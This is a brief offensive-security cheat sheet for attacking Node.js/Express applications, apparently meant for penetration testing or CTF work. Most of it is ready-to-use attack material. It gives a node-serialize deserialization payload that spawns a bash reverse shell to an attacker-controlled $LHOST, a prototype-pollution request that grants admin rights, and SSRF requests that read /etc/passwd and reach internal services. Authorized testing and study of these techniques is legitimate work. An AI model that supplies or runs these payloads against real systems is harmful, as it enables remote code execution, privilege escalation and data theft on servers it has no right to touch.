Node.js / Express

What it is: JavaScript runtime (Node.js) with Express as the most popular web framework. Deserialization attacks, prototype pollution, and SSRF are the primary vulnerabilities. Look for X-Powered-By: Express header.

Default ports: 3000, 8080, 8443

Vuln research:


Detect Node.js

Headers and error pages reveal the framework

curl -sI http://$IP/ | grep -i "x-powered-by"
# "X-Powered-By: Express" = Node.js/Express

Node.js deserialization RCE

Unsafe unserialize() — RCE via crafted cookie or input

# If the app uses node-serialize, craft IIFE payload:
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('bash -i >& /dev/tcp/$LHOST/4444 0>&1')}()"}
# Base64 encode and inject into vulnerable cookie/parameter

Prototype pollution

Modify Object.prototype — Can lead to RCE or auth bypass

curl -X POST http://$IP/api -H "Content-Type: application/json" -d '{"__proto__":{"admin":true}}'

SSRF in Node.js

Server-side request forgery — Access internal services

curl "http://$IP/fetch?url=http://127.0.0.1:3000/admin"
curl "http://$IP/fetch?url=file:///etc/passwd"